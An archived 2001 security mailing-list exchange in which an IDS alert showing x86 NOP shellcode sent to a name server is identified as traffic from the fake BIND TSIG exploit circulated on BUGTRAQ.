Security Incidents mailing list archives
Re: Named TSIG exploit ?
From: Paul Cardon <paul () MOQUIJO COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500
The source ran the fake BIND TSIG exploit released on BUGTRAQ last week using your system as the intended target. Pretty sad since it means they were also (unknowingly?) attacking NAI's name server.

-paul

Mihai Moldovanu wrote:
[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 520

The shellcode inside the second packet is pretty strange. Can anyone take a deeper look at it?
Current thread:
- Named TSIG exploit ? Mihai Moldovanu (Feb 05)
- Re: Named TSIG exploit ? Paul Cardon (Feb 05)